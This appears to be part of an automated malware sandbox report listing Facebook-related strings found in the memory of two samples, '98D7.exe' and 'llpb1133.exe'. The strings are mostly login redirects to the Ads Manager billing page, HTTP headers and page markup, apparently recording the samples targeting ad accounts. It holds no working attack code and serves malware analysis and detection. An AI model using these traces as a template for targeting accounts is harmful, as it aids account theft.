Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="x46HV0G8">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrmnc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-zzY","isCQuick":false});</script><script nonce="x46HV0G8">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="x46HV0G8"></style><script nonce="x46HV0G8">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content=" equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @www.facebook.comCwb equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Alt-Svch3=":443"; ma=86400Priorityu=3,iX-FB-Debug9W9q7O9cwERD9yl452YLI7TlpCnSPnMmbzzsHrk1MAGejrWauIysSASFTboY1ZVsRl5CUepLa/i5ffzTF4uR5Q==origin-agent-cluster?0X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupsdocument-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0cross-origin-embedder-policy-report-onlyrequire-corp;report-to="coep_report"report-to{"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 07 Feb 2023 18:46:39 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control6 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: E)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.com equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comc equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comc+07 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hwww.facebook.com/ads/manager/account_settings/account_billingalue132sames equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Kwww.facebook.com equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: LAlt-Svch3=":443"; ma=86400X-FB-Debug0vm/8I8SNdKVTJ8OyhzeiB5vOfSY+MSlVEdgCkfZyMmm399tNBJDn3byMN/GMHQLmPYx8pSyQN/MPJrxK+S1Og==origin-agent-cluster?0X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 07 Feb 2023 18:45:36 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.000000000047C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Lwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Lwww.facebook.comH equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.492565099.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Lwww.facebook.comHTEP equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: PE)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Qwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Rwww.facebook.comx equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Twww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70star-mini.c10r.facebook.comwww.facebook.comll equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Uwww.facebook.com equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Uwww.facebook.comA equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: WAdelay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wwww.facebook.com equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ad><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="f5jFR5CM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr4xk","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-WnQ","isCQuick":false});</script><script nonce="f5jFR5CM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="f5jFR5CM"></style><script nonce="f5jFR5CM">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Portuguese (Portugal)">Portugu equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: andwww.facebook.comll equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/#other_companies_section\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">other companies\u003C\/a> for advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_8_JS\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">More information\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_StXu140q-14 sx_6e887b\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp>\u003Cdiv class=\"pam _9o-n uiBoxGray\">\u003Cp class=\"_9o-o\">If you allow these cookies:\u003C\/p>\u003Cp class=\"_9o-p\">\u003Cul class=\"_9xp_\">\u003Cli class=\"_9xq0\">We\u2019ll be able to better personalize ads for you off of Meta Products, and measure their performance\u003C\/li>\u003Cli class=\"_9xq0\">Features on our products will not be affected\u003C\/li>\u003Cli class=\"_9xq0\">Oth equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: d-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: e</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Arabic"> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eIwww.facebook.comHTEP equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eive from cookies on and off Facebook\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"img sp_StXu140q-14 sx_9a85b3\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide and improve Meta Products for people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more about cookies and how we use them, and review or change your choice at any time in our \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies are required to use Meta Products. They\u2019re necessary for these sites to work as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/ac equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing"wg equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing0 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingPv equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000003.522653816.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingalue132sames equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billinge equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingm equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingndex_meta_1 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingr equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billings equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/ackY5HfXu3h@v equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000003.520897937.00000000004BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/aco","coho equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing1 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingF equals www.facebook.com (Facebook)
